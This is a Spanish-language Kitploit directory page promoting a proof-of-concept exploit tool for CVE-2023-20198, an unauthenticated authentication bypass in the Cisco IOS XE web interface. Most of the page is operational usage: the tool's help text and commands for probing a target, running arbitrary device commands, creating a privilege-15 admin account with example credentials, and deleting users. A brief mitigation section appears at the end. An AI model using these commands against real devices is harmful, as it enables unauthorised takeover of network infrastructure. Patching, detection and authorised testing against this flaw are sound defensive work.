Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-20198-Exploit — Exploit de prueba de concepto para CVE-2023-20198, una vulnerabilidad de omisión de autenticación que afecta a la interfaz web de Cisco IOS XE. | Kitploit
Herramientas/GitHubGitHub/gill-singh-a/cve-2023-20198-exploit
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubgill-singh-a/cve-2023-20198-exploit

CVE-2023-20198-Exploit

Exploit de prueba de concepto para CVE-2023-20198, una vulnerabilidad de omisión de autenticación que afecta a la interfaz web de Cisco IOS XE.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
7hace 6 mesesAún no revisado

Bypass de Autenticación en Cisco IOS XE (CVE-2023-20198)

Este repositorio contiene un exploit de prueba de concepto para CVE-2023-20198, una vulnerabilidad de bypass de autenticación que afecta a la interfaz web de Cisco IOS XE.

La vulnerabilidad permite a atacantes no autenticados ejecutar comandos arbitrarios en dispositivos Cisco vulnerables mediante solicitudes SOAP manipuladas, lo que puede llevar al compromiso total del dispositivo, incluyendo la ejecución remota de comandos y la creación/eliminación de usuarios administrativos.

Resumen de la Vulnerabilidad

  • CVE: CVE-2023-20198

  • Producto Afectado: Cisco IOS XE (Interfaz Web / Interfaz WSMA)

  • Impacto:

    • Bypass de autenticación
    • Ejecución remota de comandos (RCE)
    • Creación no autorizada de usuarios
    • Eliminación no autorizada de usuarios
  • Vector de Ataque: Red (HTTP/HTTPS)

  • Privilegios Requeridos: Ninguno (no autenticado)

Esta vulnerabilidad se debe a un manejo incorrecto de la autenticación en el endpoint del Agente de Gestión de Servicios Web (WSMA), lo que permite a los atacantes evadir la autenticación mediante solicitudes HTTP manipuladas.

Requisitos

  • Python 3.x
  • requests
  • colorama

Instalar dependencias:

root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]

Authentication Bypass Exploit for Cisco IOS XE Devices (CVE-2023-20198)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Cisco IOS XE Device
  -c, --check           Check if the Target is vulnerable to CVE-2023-20198
  -C CMD, --cmd CMD     Cisco IOS XE Command to Execute
  -a, --add             Add New Username and Password
  -d, --delete          Delete existing User
  -u USERNAME, --username USERNAME
                        Username for Account Creation
  -p PASSWORD, --password PASSWORD
                        Password for Account Creation (Random Password Generated if not Provided)

Uso

Opciones de Línea de Comandos

Comprobación de Vulnerabilidad

Comprueba si el objetivo es vulnerable:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -c

Comprobación de Vulnerabilidad

Si es vulnerable, la herramienta detectará automáticamente el endpoint WSMA explotable y mostrará los detalles del dispositivo.

Ejecución Remota de Comandos

Ejecuta comandos en el dispositivo vulnerable:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"

Ejemplo:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

Explotación

Añadir Usuario Administrativo

Crea un nuevo usuario administrador con privilegios de nivel 15:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

Creación de Cuenta

Si no se proporciona una contraseña, el script genera una contraseña segura aleatoria automáticamente.

Acceso a la Interfaz Web

Con la cuenta recién creada, puedes acceder a la interfaz web del dispositivo

Interfaz Web

Eliminar Usuario Existente

Elimina un usuario existente:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -d -u cisco

Eliminación de Cuenta

Detección y Mitigación

  • Actualice Cisco IOS XE a la última versión parcheada

  • Deshabilite la interfaz web si no es necesaria:

    root@kitploit:~
    no ip http server
    no ip http secure-server
    
  • Restrinja el acceso de administración mediante ACLs

Referencias

  • Aviso de Cisco — CVE-2023-20198
  • NVD: CVE-2023-20198
  • Documentación de Cisco IOS XE WSMA
  • Informes de la Comunidad de Investigación en Seguridad
Descargar herramienta
OpciónDescripción
-t, --targetDispositivo Cisco IOS XE objetivo (Requerido)
-c, --checkComprobar si el objetivo es vulnerable
-C, --cmdEjecutar un comando de Cisco IOS XE
-a, --addAñadir un nuevo usuario administrativo
-d, --deleteEliminar un usuario existente
-u, --usernameNombre de usuario para creación/eliminación de cuenta
-p, --passwordContraseña para la nueva cuenta (aleatoria si no se proporciona)